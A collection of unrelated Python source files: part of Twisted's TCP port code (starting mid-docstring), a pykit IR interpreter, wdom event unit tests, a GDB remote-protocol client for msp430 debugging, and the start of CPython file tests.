@type connected: C{bool}
"""
implements(interfaces.IListeningPort)
addressFamily = socket.AF_INET
socketType = socket.SOCK_STREAM
transport = Server
sessionno = 0
interface = ''
backlog = 50
# Actual port number being listened on, only set to a non-None
# value when we are actually listening.
_realPortNumber = None
def __init__(self, port, factory, backlog=50, interface='', reactor=None):
"""Initialize with a numeric port to listen on.
"""
base.BasePort.__init__(self, reactor=reactor)
self.port = port
self.factory = factory
self.backlog = backlog
self.interface = interface
def __repr__(self):
if self._realPortNumber is not None:
return "<%s of %s on %s>" % (self.__class__, self.factory.__class__,
self._realPortNumber)
else:
return "<%s of %s (not listening)>" % (self.__class__, self.factory.__class__)
def createInternetSocket(self):
s = base.BasePort.createInternetSocket(self)
if platformType == "posix" and sys.platform != "cygwin":
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s
def startListening(self):
"""Create and bind my socket, and begin listening on it.
This is called on unserialization, and must be called after creating a
server to begin listening on the specified port.
"""
try:
skt = self.createInternetSocket()
skt.bind((self.interface, self.port))
except socket.error, le:
raise CannotListenError, (self.interface, self.port, le)
# Make sure that if we listened on port 0, we update that to
# reflect what the OS actually assigned us.
self._realPortNumber = skt.getsockname()[1]
log.msg("%s starting on %s" % (self.factory.__class__, self._realPortNumber))
# The order of the next 6 lines is kind of bizarre. If no one
# can explain it, perhaps we should re-arrange them.
self.factory.doStart()
skt.listen(self.backlog)
self.connected = True
self.socket = skt
self.fileno = self.socket.fileno
self.numberAccepts = 100
self.startReading()
def _buildAddr(self, (host, port)):
return address._ServerFactoryIPv4Address('TCP', host, port)
def doRead(self):
"""Called when my socket is ready for reading.
This accepts a connection and calls self.protocol() to handle the
wire-level protocol.
"""
try:
if platformType == "posix":
numAccepts = self.numberAccepts
else:
# win32 event loop breaks if we do more than one accept()
# in an iteration of the event loop.
numAccepts = 1
for i in range(numAccepts):
# we need this so we can deal with a factory's buildProtocol
# calling our loseConnection
if self.disconnecting:
return
try:
skt, addr = self.socket.accept()
except socket.error, e:
if e.args[0] in (EWOULDBLOCK, EAGAIN):
self.numberAccepts = i
break
elif e.args[0] == EPERM:
# Netfilter on Linux may have rejected the
# connection, but we get told to try to accept()
# anyway.
continue
elif e.args[0] in (EMFILE, ENOBUFS, ENFILE, ENOMEM, ECONNABORTED):
# Linux gives EMFILE when a process is not allowed
# to allocate any more file descriptors. *BSD and
# Win32 give (WSA)ENOBUFS. Linux can also give
# ENFILE if the system is out of inodes, or ENOMEM
# if there is insufficient memory to allocate a new
# dentry. ECONNABORTED is documented as possible on
# both Linux and Windows, but it is not clear
# whether there are actually any circumstances under
# which it can happen (one might expect it to be
# possible if a client sends a FIN or RST after the
# server sends a SYN|ACK but before application code
# calls accept(2), however at least on Linux this
# _seems_ to be short-circuited by syncookies.
log.msg("Could not accept new connection (%s)" % (
errorcode[e.args[0]],))
break
raise
fdesc._setCloseOnExec(skt.fileno())
protocol = self.factory.buildProtocol(self._buildAddr(addr))
if protocol is None:
skt.close()
continue
s = self.sessionno
self.sessionno = s+1
transport = self.transport(skt, protocol, addr, self, s, self.reactor)
transport = self._preMakeConnection(transport)
protocol.makeConnection(transport)
else:
self.numberAccepts = self.numberAccepts+20
except:
# Note that in TLS mode, this will possibly catch SSL.Errors
# raised by self.socket.accept()
#
# There is no "except SSL.Error:" above because SSL may be
# None if there is no SSL support. In any case, all the
# "except SSL.Error:" suite would probably do is log.deferr()
# and return, so handling it here works just as well.
log.deferr()
def _preMakeConnection(self, transport):
return transport
def loseConnection(self, connDone=failure.Failure(main.CONNECTION_DONE)):
"""
Stop accepting connections on this port.
This will shut down the socket and call self.connectionLost(). It
returns a deferred which will fire successfully when the port is
actually closed, or with a failure if an error occurs shutting down.
"""
self.disconnecting = True
self.stopReading()
if self.connected:
self.deferred = deferLater(
self.reactor, 0, self.connectionLost, connDone)
return self.deferred
stopListening = loseConnection
def _logConnectionLostMsg(self):
"""
Log message for closing port
"""
log.msg('(TCP Port %s Closed)' % (self._realPortNumber,))
def connectionLost(self, reason):
"""
Cleans up the socket.
"""
self._logConnectionLostMsg()
self._realPortNumber = None
base.BasePort.connectionLost(self, reason)
self.connected = False
self._closeSocket()
del self.socket
del self.fileno
try:
self.factory.doStop()
finally:
self.disconnecting = False
def logPrefix(self):
"""Returns the name of my class, to prefix log entries with.
"""
return reflect.qual(self.factory.__class__)
def getHost(self):
"""Returns an IPv4Address.
This indicates the server's address.
"""
return address.IPv4Address('TCP', *(self.socket.getsockname() + ('INET',)))
class Connector(base.BaseConnector):
def __init__(self, host, port, factory, timeout, bindAddress, reactor=None):
self.host = host
if isinstance(port, types.StringTypes):
try:
port = socket.getservbyname(port, 'tcp')
except socket.error, e:
raise error.ServiceNameUnknownError(string="%s (%r)" % (e, port))
self.port = port
self.bindAddress = bindAddress
base.BaseConnector.__init__(self, factory, timeout, reactor)
def _makeTransport(self):
return Client(self.host, self.port, self.bindAddress, self, self.reactor)
def getDestination(self):
return address.IPv4Address('TCP', self.host, self.port, 'INET')
| |
# -*- coding: utf-8 -*-
"""
IR interpreter.
"""
from __future__ import print_function, division, absolute_import
import ctypes
import operator
try:
import exceptions
except ImportError:
import builtins as exceptions
from itertools import chain, product
from collections import namedtuple
from functools import partial
import numpy as np
from pykit import types
from pykit.ir import Function, Block, GlobalValue, Const, combine, ArgLoader
from pykit.ir import ops, linearize, defs, tracing
from pykit.utils import ValueDict
#===------------------------------------------------------------------===
# Interpreter
#===------------------------------------------------------------------===
Undef = "Undef" # Undefined/uninitialized value
State = namedtuple('State', ['refs']) # State shared by stack frames
class Reference(object):
"""
Models a reference to an object
"""
def __init__(self, obj, refcount, producer):
self.obj = obj
self.refcount = refcount
self.producer = producer
class UncaughtException(Exception):
"""
Raised by the interpreter when code raises an exception that isn't caught
"""
class Interp(object):
"""
Interpret the function given as a ir.Function. See the run() function
below.
func: The ir.Function we interpret
exc_model: ExceptionModel that knows how to deal with exceptions
argloader: InterpArgloader: knows how pykit Values are associated
with runtime (stack) values (loads from the store)
ops: Flat list of instruction targets (['%0'])
blockstarts: Dict mapping block labels to address offsets
prevblock: Previously executing basic block
pc: Program Counter
lastpc: Last value of Program Counter
exc_handlers: List of exception target blocks to try
exception: Currently raised exception
refs: { id(obj) : Reference }
"""
def __init__(self, func, env, exc_model, argloader, tracer):
self.func = func
self.env = env
self.exc_model = exc_model
self.argloader = argloader
self.state = {
'env': env,
'exc_model': exc_model,
'tracer': tracer,
}
self.ops, self.blockstarts = linearize(func)
self.lastpc = 0
self._pc = 0
self.prevblock = None
self.exc_handlers = None
self.exception = None
# __________________________________________________________________
# Utils
def incr_pc(self):
"""Increment program counter"""
self.pc += 1
def decr_pc(self):
"""Decrement program counter"""
self.pc -= 1
def halt(self):
"""Stop interpreting"""
self.pc = -1
@property
def op(self):
"""Return the current operation"""
return self.getop(self.pc)
def getop(self, pc):
"""PC -> Op"""
return self.ops[pc]
def setpc(self, newpc):
self.lastpc = self.pc
self._pc = newpc
pc = property(lambda self: self._pc, setpc, doc="Program Counter")
def blockswitch(self, oldblock, newblock, valuemap):
self.prevblock = oldblock
self.exc_handlers = []
self.execute_phis(newblock, valuemap)
def execute_phis(self, block, valuemap):
"""
Execute all phis in parallel, i.e. execute them before updating the
store.
"""
new_values = {}
for op in block.leaders:
if op.opcode == 'phi':
new_values[op.result] = self.execute_phi(op)
valuemap.update(new_values)
def execute_phi(self, op):
for i, block in enumerate(op.args[0]):
if block == self.prevblock:
values = op.args[1]
return self.argloader.load_op(values[i])
raise RuntimeError("Previous block %r not a predecessor of %r!" %
(self.prevblock.name, op.block.name))
noop = lambda *args: None
# __________________________________________________________________
# Core operations
# unary, binary and compare operations set below
def convert(self, arg):
return types.convert(arg, self.op.type)
# __________________________________________________________________
# Var
def alloca(self, numitems=None):
return { 'value': Undef, 'type': self.op.type }
def load(self, var):
#assert var['value'] is not Undef, self.op
return var['value']
def store(self, value, var):
if isinstance(value, dict) and set(value) == set(['type', 'value']):
value = value['value']
var['value'] = value
def phi(self):
"See execute_phis"
return self.argloader.load_op(self.op)
# __________________________________________________________________
# Functions
def function(self, funcname):
return self.func.module.get_function(funcname)
def call(self, func, args):
if isinstance(func, Function):
# We're calling another known pykit function,
try:
return run(func, args=args, **self.state)
except UncaughtException as e:
# make sure to handle any uncaught exceptions properly
self.exception, = e.args
self._propagate_exc()
else:
return func(*args)
def call_math(self, fname, *args):
return defs.math_funcs[fname](*args)
# __________________________________________________________________
# Attributes
def getfield(self, obj, attr):
if obj['value'] is Undef:
return Undef
return obj['value'][attr] # structs are dicts
def setfield(self, obj, attr, value):
if obj['value'] is Undef:
obj['value'] = {}
obj['value'][attr] = value
# __________________________________________________________________
print = print
# __________________________________________________________________
# Pointer
def ptradd(self, ptr, addend):
value = ctypes.cast(ptr, ctypes.c_void_p).value
itemsize = ctypes.sizeof(type(ptr)._type_)
return ctypes.cast(value + itemsize * addend, type(ptr))
def ptrload(self, ptr):
return ptr[0]
def ptrstore(self, value, ptr):
ptr[0] = value
def ptr_isnull(self, ptr):
return ctypes.cast(ptr, ctypes.c_void_p).value == 0
def func_from_addr(self, ptr):
type = self.op.type
return ctypes.cast(ptr, types.to_ctypes(type))
# __________________________________________________________________
# Control flow
def ret(self, arg):
self.halt()
if self.func.type.restype != types.Void:
return arg
def cbranch(self, test, true, false):
if test:
self.pc = self.blockstarts[true.name]
else:
self.pc = self.blockstarts[false.name]
def jump(self, block):
self.pc = self.blockstarts[block.name]
# __________________________________________________________________
# Exceptions
def new_exc(self, exc_name, exc_args):
return self.exc_model.exc_instantiate(exc_name, *exc_args)
def exc_catch(self, types):
self.exception = None # We caught it!
def exc_setup(self, exc_handlers):
self.exc_handlers = exc_handlers
def exc_throw(self, exc):
self.exception = exc
self._propagate_exc() # Find exception handler
def _exc_match(self, exc_types):
"""
See whether the current exception matches any of the exception types
"""
return any(self.exc_model.exc_match(self.exception, exc_type)
for exc_type in exc_types)
def _propagate_exc(self):
"""Propagate installed exception (`self.exception`)"""
catch_op = self._find_handler()
if catch_op:
# Exception caught! Transfer control to block
catch_block = catch_op.parent
self.pc = self.blockstarts[catch_block.name]
else:
# No exception handler!
raise UncaughtException(self.exception)
def _find_handler(self):
"""Find a handler for an active exception"""
exc = self.exception
for block in self.exc_handlers:
for leader in block.leaders:
if leader.opcode != ops.exc_catch:
continue
args = [arg.const for arg in leader.args[0]]
if self._exc_match(args):
return leader
# __________________________________________________________________
# Generators
def yieldfrom(self, op):
pass # TODO:
def yieldval(self, op):
pass # TODO:
# Set unary, binary and compare operators
for opname, evaluator in chain(defs.unary.items(), defs.binary.items(),
defs.compare.items()):
setattr(Interp, opname, staticmethod(evaluator))
#===------------------------------------------------------------------===
# Exceptions
#===------------------------------------------------------------------===
class ExceptionModel(object):
"""
Model that governs the exception hierarchy
"""
def exc_op_match(self, exc_type, op):
"""
See whether `exception` matches `exc_type`
"""
assert exc_type.opcode == 'constant'
if op.opcode == 'constant':
return self.exc_match(exc_type.const, op.const)
raise NotImplementedError("Dynamic exception checks")
def exc_match(self, exc_type, exception):
"""
See whether `exception` matches `exc_type`
"""
return (isinstance(exc_type, exception) or
issubclass(exception, exc_type))
def exc_instantiate(self, exc_name, *args):
"""
Instantiate an exception
"""
exc_type = getattr(exceptions, exc_name)
return exc_type(*args)
#===------------------------------------------------------------------===
# Run
#===------------------------------------------------------------------===
class InterpArgLoader(ArgLoader):
def load_GlobalValue(self, arg):
assert not arg.external, "Not supported yet"
return arg.value.const
def load_Undef(self, arg):
return Undef
def run(func, env=None, exc_model=None, _state=None, args=(),
tracer=tracing.DummyTracer()):
"""
Interpret function. Raises UncaughtException(exc) for uncaught exceptions
"""
assert len(func.args) == len(args)
tracer.push(tracing.Call(func, args))
# -------------------------------------------------
# Set up interpreter
valuemap = dict(zip(func.argnames, args)) # { '%0' : pyval }
argloader = InterpArgLoader(valuemap)
interp = Interp(func, env, exc_model or ExceptionModel(),
argloader, tracer)
if env:
handlers = env.get("interp.handlers") or {}
else:
handlers = {}
# -------------------------------------------------
# Eval loop
curblock = None
while True:
# -------------------------------------------------
# Block transitioning
op = interp.op
if op.block != curblock:
interp.blockswitch(curblock, op.block, valuemap)
curblock = op.block
# -------------------------------------------------
# Find handler
if op.opcode in handlers:
fn = partial(handlers[op.opcode], interp)
else:
fn = getattr(interp, op.opcode)
# -------------------------------------------------
# Load arguments
args = argloader.load_args(op)
# -------------------------------------------------
# Execute...
tracer.push(tracing.Op(op, args))
oldpc = interp.pc
try:
result = fn(*args)
except UncaughtException, e:
tracer.push(tracing.Exc(e))
raise
valuemap[op.result] = result
tracer.push(tracing.Res(op, args, result))
# -------------------------------------------------
# Advance PC
if oldpc == interp.pc:
interp.incr_pc()
elif interp.pc == -1:
# Returning...
tracer.push(tracing.Ret(result))
return result
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import asyncio
from copy import deepcopy
from unittest.mock import MagicMock, call
from syncer import sync
from wdom.document import get_document
from wdom.event import Event, EventListener, EventTarget, create_event
from wdom.event import MouseEvent, DataTransfer, DragEvent
from wdom.server.handler import create_event_from_msg
from wdom.web_node import WdomElement
from .base import TestCase
class TestDataTransfer(TestCase):
def test_empty(self):
dt = DataTransfer()
self.assertEqual(dt.length, 0)
self.assertEqual(dt.getData('test'), '')
def test_set_clear_data(self):
dt = DataTransfer()
dt.setData('text/plain', 'test')
self.assertEqual(dt.getData('text/plain'), 'test')
self.assertEqual(dt.getData('test'), '')
dt.setData('text/plain', 'test2')
self.assertEqual(dt.getData('text/plain'), 'test2')
dt.setData('text/html', 'test3')
self.assertEqual(dt.getData('text/plain'), 'test2')
self.assertEqual(dt.getData('text/html'), 'test3')
dt.clearData('text/plain')
self.assertEqual(dt.getData('text/plain'), '')
self.assertEqual(dt.getData('text/html'), 'test3')
dt.clearData()
self.assertEqual(dt.getData('text/plain'), '')
self.assertEqual(dt.getData('text/html'), '')
def test_normalize(self):
dt = DataTransfer()
dt.setData('text', 'test')
self.assertEqual(dt.getData('text'), 'test')
self.assertEqual(dt.getData('text/plain'), 'test')
self.assertEqual(dt.getData('text/html'), '')
dt.clearData('text')
self.assertEqual(dt.getData('text'), '')
self.assertEqual(dt.getData('text/plain'), '')
self.assertEqual(dt.getData('text/html'), '')
class TestEvent(TestCase):
def setUp(self):
self.msg = {'type': 'event'}
self.e = Event('event', init=self.msg)
def test_event(self):
self.assertEqual(self.e.type, 'event')
self.assertIs(self.e.init, self.msg)
self.assertIsNone(self.e.currentTarget)
self.assertIsNone(self.e.target)
def test_craete_event(self):
self.elm = WdomElement('tag')
msg = {
'proto': 'event',
'type': 'event',
'currentTarget': {'id': self.elm.wdom_id},
'target': {'id': self.elm.wdom_id},
}
e = create_event(msg)
self.assertEqual(e.type, 'event')
self.assertIs(e.currentTarget, self.elm)
self.assertIs(e.target, self.elm)
self.assertIs(e.init, msg)
class TestDragEvent(TestCase):
def setUp(self):
super().setUp()
self.msg = {
'type': 'drag',
'proto': 'DragEvent',
'dataTransfer': {'id': ''},
}
self.msg1 = deepcopy(self.msg)
self.msg2 = deepcopy(self.msg)
self.msg3 = deepcopy(self.msg)
self.msg4 = deepcopy(self.msg)
self.msg5 = deepcopy(self.msg)
self.msg1['type'] = 'dragstart'
self.msg2['type'] = 'dragend'
self.msg3['type'] = 'drop'
self.msg4['type'] = 'dragstart'
self.msg5['type'] = 'drop'
self.msg1['dataTransfer']['id'] = '1'
self.msg2['dataTransfer']['id'] = '1'
self.msg3['dataTransfer']['id'] = '1'
self.msg4['dataTransfer']['id'] = '2'
self.msg5['dataTransfer']['id'] = '2'
def tearDown(self):
DataTransfer._store.clear()
super().tearDown()
def test_init(self):
de = DragEvent('drag', self.msg)
self.assertEqual(de.type, 'drag')
self.assertEqual(de.dataTransfer.getData('test'), '')
def test_start_drop_end(self):
de1 = DragEvent('dragstart', self.msg1)
self.assertEqual(len(DataTransfer._store), 1)
de1.dataTransfer.setData('text/plain', 'test')
self.assertEqual(de1.dataTransfer.getData('text/plain'), 'test')
de3 = DragEvent('drop', self.msg3)
self.assertEqual(len(DataTransfer._store), 1)
self.assertEqual(de3.dataTransfer.getData('text/plain'), 'test')
de2 = DragEvent('dragend', self.msg2)
self.assertEqual(len(DataTransfer._store), 0)
self.assertEqual(de2.dataTransfer.getData('text/plain'), 'test')
def test_different_id(self):
de1 = DragEvent('dragstart', self.msg1) # id = 1
self.assertEqual(len(DataTransfer._store), 1)
de1.dataTransfer.setData('text/plain', 'test')
de2 = DragEvent('drop', self.msg5) # id = 2
self.assertEqual(len(DataTransfer._store), 2)
self.assertEqual(de2.dataTransfer.getData('text/plain'), '')
de3 = DragEvent('drop', self.msg3) # id = 1
self.assertEqual(len(DataTransfer._store), 2)
self.assertEqual(de3.dataTransfer.getData('text/plain'), 'test')
class TestCreateEventMsg(TestCase):
def setUp(self):
self.elm = WdomElement('tag')
self.doc = get_document()
def test_event_from_msg(self):
msg = {
'type': 'event',
'currentTarget': {'id': self.elm.wdom_id},
'target': {'id': self.elm.wdom_id},
}
e = create_event_from_msg(msg)
self.assertEqual(e.type, 'event')
self.assertIs(e.currentTarget, self.elm)
self.assertIs(e.target, self.elm)
self.assertIs(e.init, msg)
self.assertTrue(isinstance(e, Event))
def test_event_from_msg_proto(self):
msg = {
'proto': 'MouseEvent',
'type': 'event',
'currentTarget': {'id': self.elm.wdom_id},
'target': {'id': self.elm.wdom_id},
}
e = create_event_from_msg(msg)
self.assertEqual(e.type, 'event')
self.assertIs(e.currentTarget, self.elm)
self.assertIs(e.target, self.elm)
self.assertIs(e.init, msg)
self.assertTrue(isinstance(e, Event))
self.assertTrue(isinstance(e, MouseEvent))
def test_event_from_msg_notarget(self):
msg = {
'type': 'event',
}
e = create_event_from_msg(msg)
self.assertEqual(e.type, 'event')
self.assertIsNone(e.currentTarget)
self.assertIsNone(e.target)
self.assertIs(e.init, msg)
class TestEventListener(TestCase):
def setUp(self):
self._cofunc_call_count = 0
self._cofunc_calls = []
async def a(event):
nonlocal self
self._cofunc_call_count += 1
self._cofunc_calls.append(event)
await asyncio.sleep(0)
self.e = Event('event')
self.func = MagicMock(_is_coroutine=False)
self.cofunc = a
self.func_listener = EventListener(self.func)
self.cofunc_listener = EventListener(self.cofunc)
def test_func(self):
self.func_listener(self.e)
self.func.assert_called_once_with(self.e)
@sync
async def test_cofunc(self):
await self.cofunc_listener(self.e)
self.assertEqual(self._cofunc_call_count, 1)
self.assertEqual(self._cofunc_calls[0], self.e)
class TestEventTarget(TestCase):
def setUp(self):
self.target = EventTarget()
self.mock = MagicMock(_is_coroutine=False)
self.e = Event('click')
def test_event_dispatch(self):
self.target.addEventListener('click', self.mock)
self.assertEqual(len(self.target._event_listeners), 1)
self.target.dispatchEvent(self.e)
self.mock.assert_called_once_with(self.e)
def test_event_dispatch_empty(self):
self.target.dispatchEvent(self.e)
self.mock.assert_not_called()
def test_event_dispatch_multi(self):
e1 = Event('click')
e2 = Event('click')
self.target.addEventListener('click', self.mock)
self.target.dispatchEvent(e1)
self.target.dispatchEvent(e2)
self.assertEqual(self.mock.call_count, 2)
self.mock.assert_has_calls([call(e1), call(e2)])
def test_defferent_event_dispatch(self):
mock1 = MagicMock(_is_coroutine=False)
mock2 = MagicMock(_is_coroutine=False)
e1 = Event('click')
e2 = Event('event')
self.target.addEventListener('click', mock1)
self.target.addEventListener('event', mock2)
self.assertEqual(len(self.target._event_listeners), 2)
self.target.dispatchEvent(e1)
mock1.assert_called_once_with(e1)
mock2.assert_not_called()
self.target.dispatchEvent(e2)
mock1.assert_called_once_with(e1)
mock2.assert_called_once_with(e2)
def test_remove_event(self):
self.target.addEventListener('click', self.mock)
self.target.removeEventListener('click', self.mock)
self.target.dispatchEvent(self.e)
self.mock.assert_not_called()
def test_remove_event_multi(self):
self.target.addEventListener('click', self.mock)
self.assertEqual(len(self.target._event_listeners), 1)
self.target.removeEventListener('click', self.mock)
self.assertEqual(len(self.target._event_listeners), 0)
self.target.dispatchEvent(self.e)
self.mock.assert_not_called()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2002-2010 Chris Liechti <cliechti@gmx.net>
# All Rights Reserved.
# Simplified BSD License (see LICENSE.txt for full text)
"""\
Interface to GDB server suing a TCP/IP connection.
It can be used to talk to e.g. msp430-gdbproxy or mspdebug.
"""
from struct import pack, unpack
import socket
import threading
import Queue
class GDBException(Exception):
"""Generic protocol errors"""
class GDBRemoteTimeout(GDBException):
"""If target does not answer"""
class GDBRemoteTooManyFailures(GDBException):
"""If target does not answer"""
class GDBUnknownCommandError(GDBException):
"""If target does not know this command"""
class GDBRemoteError(GDBException):
"""Target answered with 'E' (error) packet"""
def __init__(self, errorcode, message):
GDBException.__init__(self, message)
self.errorcode = errorcode
def getErrorCode(self):
return self.errorcode
HEXDIGITS = '0123456789abcdefABCDEF'
IDLE, DATA, CRC1, CRC2 = ' ', '$', '1', '2'
WAITING, SUCCESS, FAILURE = 0, 1, 2
# breakpoint/watchpoint types:
BRK_SOFTWARE = 0
BRK_HARDWARE = 1
BRK_WRITEWATCH = 2
BRK_READWATCH = 3
BRK_ACCESSWATCH = 4
STOP_SIGNAL = 'signal'
STOP_THREAD = 'thread'
STOP_EXITED = 'exited'
class ClientSocketConnector(threading.Thread):
"""\
Make a connection through a TCP/IP socket. This version connects to a
server (i.e. is a client).
"""
def __init__(self, host_port):
"""
The host/port tuple from the parameter is used to open a TCP/IP
connection. It is passed to socket.connect().
"""
threading.Thread.__init__(self)
self.setDaemon(True) # we don't want to block on exit
self._alive = True
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect(host_port)
self.socket.settimeout(5)
self.start()
def write(self, text):
"""Just send everything"""
self.socket.sendall(text)
def close(self):
"""Close connection."""
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
self._alive = False
def run(self):
"""\
Implement an efficient read loop for sockets.
"""
while self._alive:
try:
text = self.socket.recv(1024)
except socket.timeout:
pass
except socket.error:
break # socket error -> terminate
else:
if not text: break # EOF -> terminate
self.handle_partial_data(text)
self._alive = False
# dummy decoder, not changing the message
def identity(x): return x
# decoder for Stop Reply Packets
def decodeStopReplyPackets(message):
#~ print "decodeStopReplyPackets"
if message[0:1] == 'S':
#abort with signal
return STOP_SIGNAL, int(message[1:], 16)
elif message[0:1] == 'T':
signal = int(message[1:3], 16)
if message[-1] == ';':
extra = message[3:-1].split(';')
else:
extra = message[3:].split(';')
return STOP_THREAD, signal, extra
elif message[0:1] == 'W' or message[0:1] == 'X':
#abort with signal
return STOP_EXITED, int(message[1:], 16)
else:
raise GDBException("unknown Stop Reply Packet")
def hex2registers(message):
return list(unpack('<HHHHHHHHHHHHHHHH', bytes(message).decode('hex')))
def decodeRegister(message):
return unpack('<H', bytes(message).decode('hex'))[0]
def encodeRegister(value):
return bytes(pack('<H', value).encode('hex'))
class GDBClient(ClientSocketConnector):
def __init__(self, *args, **kwargs):
ClientSocketConnector.__init__(self, *args, **kwargs)
self.packet = []
self.recv_mode = IDLE
self.acknowledged = None
self.errorcounter = 0 # count NACKS
self.decoder = None
self._lock = threading.Lock()
self.answer = Queue.Queue()
def handle_partial_data(self, data):
#~ print data
for character in data:
if character == '+':
#~ print "ACK" #XXX DEBUG
self.acknowledged = SUCCESS
#~ self.answer.put(None)
elif character == '-':
#~ print "NACK" #XXX DEBUG
self.errorcounter += 1
self.answer.put(GDBRemoteError('Checksum error'))
elif character == '$':
del self.packet[:]
self.recv_mode = DATA
elif character == '#':
self.recv_mode = CRC1
else:
if self.recv_mode == DATA: # save data in packet
self.packet.append(character)
elif self.recv_mode == CRC1: # get checksum 1
if character in HEXDIGITS:
self.c1 = character
self.recv_mode = CRC2
elif self.recv_mode == CRC2: # get checksum 2
if character in HEXDIGITS:
c2 = character
checksum = 0
for character in self.packet:
checksum = (checksum + ord(character)) & 0xff
if int(self.c1 + c2, 16) == checksum:
self.write('+')
self.handle_packet(''.join(self.packet))
del self.packet[:]
self.recv_mode = IDLE
else:
self.write('-')
def handle_packet(self, packet):
#~ print 'handle_packet(%r) decoder=%r' % (packet, self.decoder)
if packet == '':
self.answer.put(GDBUnknownCommandError("Unknown command"))
elif packet[0:1] == 'E':
errorcode = int(packet[1:],16)
self.answer.put(GDBRemoteError(errorcode, "Target responded with error code %d" % errorcode))
elif packet[0:2] == 'OK':
self.answer.put(None)
elif packet[0:1] == 'o' or packet[0:1] == 'O':
message = packet[1:]
if len(message) & 1:
print "Odd length 'o' message - cutting off last character" #XXX hack
message = message[:-1]
self.output(message.decode('hex'))
else:
self.answer.put(packet.decode('hex'))
#~ else:
#~ print "unwanted packet: %r" % packet #XXX ugly
# --- callbacks ---
def output(self, message):
"""called on 'o' (output) packages"""
print "REMOTE>", message
# --- commands ---
def set_extended(self):
"""! -- extended mode
expected answer '' or 'OK'"""
return self._remote_command('!')
def last_signal(self):
"""? -- last signal
expected answer Stop Reply Packets"""
return self._remote_command('?', decoder=decodeStopReplyPackets)
def cont(self, startaddress=None, nowait=False):
"""caddr -- continue
expected answer Stop Reply Packets"""
return self._remote_command('c%s' % (
startaddress is not None and '%x' % startaddress or ''
), decoder=decodeStopReplyPackets, nowait=nowait, timeout=None
)
def cont_with_signal(self, signal, startaddress=None):
"""Csig;addr -- continue with signal
expected answer Stop Reply Packets"""
return self._remote_command('C%02x%s' % (
signal,
startaddress is not None and ';%x' % startaddress or ''
), decoder=decodeStopReplyPackets
)
#~ def gdbDetach(self):
#~ """D -- detach
#~ no answer"""
#~ return self._remote_command('D')
def read_registers(self):
"""g -- read registers
expected answer 'XX...' or 'ENN'"""
return self._remote_command('g', decoder=hex2registers)
def write_registers(self, registers):
"""GXX... -- write registers
expected answer 'OK' or 'ENN'"""
return self._remote_command('G%s' % ''.join([encodeRegister(r) for r in registers]))
def cycle_step(self, cycles, startaddress=None):
"""iaddr,nnn -- cycle step (draft)
expected answer 'OK' or 'ENN'"""
return self._remote_command('i%s,%x' % (startaddress is not None and '%x' % startaddress or '', cycles))
def read_memory(self, startaddress, size):
"""maddr,length -- read memory
expected answer 'XX...' or 'Enn'"""
return self._remote_command('m%x,%x' % (startaddress, size))
def write_memory(self, startaddress, data):
"""maddr,length -- read memory
expected answer 'OK' or 'Enn'"""
return self._remote_command('M%x,%x:%s' % (startaddress, len(data), bytes(data).encode('hex')))
def read_register(self, regnum):
"""pn... -- read reg (reserved)
expected answer 'XX...' or 'Enn'"""
return self._remote_command('p%x' % (regnum), decoder=decodeRegister)
def write_register(self, regnum, value):
"""Pn...=r... -- write register
expected answer 'OK' or 'Enn'"""
return self._remote_command('P%x=%s' % (regnum, encodeRegister(value)))
def query(self, query, nowait=False):
"""query -- general query
expected answer 'OK' or 'Enn' or ''"""
return self._remote_command('q%s' % (query,), nowait=nowait)
def set(self, name, value):
"""Qvar=val -- general set
expected answer 'OK' or 'Enn' or ''"""
return self._remote_command('Q%s=%s' % (name, value))
#~ def gdbRemoteRestart(self):
#~ """RXX -- remote restart
#~ no answer expected"""
#~ return self._remote_command('Q%s=%s' % (querry, value))
def step(self, startaddress = None):
"""saddr -- step
expected answer Stop Reply Packets"""
return self._remote_command('s%s' % (
startaddress is not None and '%x' % startaddress or ''
), decoder=decodeStopReplyPackets
)
def step_with_signal(self, signal, startaddress=None):
"""Ssig;addr -- step with signal
expected answer Stop Reply Packets"""
return self._remote_command('S%02x%s' % (
signal,
startaddress is not None and ';%x' % startaddress or ''
), decoder=decodeStopReplyPackets
)
def write_memory_binary(self, startaddress, data):
"""maddr,data -- write memory
expected answer 'OK' or 'Enn'"""
def escape(s):
res = []
for c in s:
if c in ('$', '#', '\x7d'):
res.extend(['\x7d', chr(ord(c) ^ 0x20)])
else:
res.append(c)
return ''.join(res)
return self._remote_command('X%x,%x:%s' % (startaddress, len(data), escape(data)))
def remove_breakpoint(self, type, address, length):
"""zt,addr,length -- remove break or watchpoint (draft)
expected answer 'OK' 'Enn' or ''"""
return self._remote_command('z%x,%x,%x' % (type, address, length))
def set_breakpoint(self, type, address, length):
"""Zt,addr,length -- insert break or watchpoint (draft)
expected answer 'OK' 'Enn' or ''"""
return self._remote_command('Z%x,%x,%x' % (type, address, length))
def monitor(self, command, nowait=False):
"""pass commands to the target interpreter
expected answer 'OK' or 'Enn' or ''"""
return self.query('Rcmd,%s' % bytes(command).encode('hex'), nowait=nowait)
# ---
def interrupt(self):
"""send Control+C.
may be used to stop the target if it is running (e.g. after a 'c' command).
no effect on a stopped target."""
self.write('\x03')
# --- internal helper ---
def _remote_command(self, cmd, decoder=identity, timeout=3, nowait=False):
self._lock.acquire()
try:
# clear queue
while self.answer.qsize():
self.answer.get_nowait()
# send new commnad
checksum = 0
for character in cmd:
checksum = (checksum + ord(character)) & 0xff
message = '$%s#%02x' % (cmd, checksum)
self.write(message)
if nowait:
return
ans = self.answer.get(timeout=timeout)
if isinstance(ans, Exception):
raise ans
else:
return decoder(ans)
except Queue.Empty:
raise GDBRemoteTimeout('no answer to command received within time')
finally:
self._lock.release()
# ----- test code only below this line -----
if __name__ == '__main__':
gdb = GDBClient(('', 2000))
gdb.monitor('help')
import time; time.sleep(5)
| |
import sys
import os
import unittest
from array import array
from weakref import proxy
import io
import _pyio as pyio
from test.support import TESTFN, run_unittest, gc_collect
from collections import UserList
class AutoFileTests(unittest.TestCase):
# file tests for which a test file is automatically set up
def setUp(self):
self.f = self.open(TESTFN, 'wb')
def tearDown(self):
if self.f:
self.f.close()
os.remove(TESTFN)
def testWeakRefs(self):
# verify weak references
p = proxy(self.f)
p.write(b'teststring')
self.assertEqual(self.f.tell(), p.tell())
self.f.close()
self.f = None
gc_collect()
self.assertRaises(ReferenceError, getattr, p, 'tell')
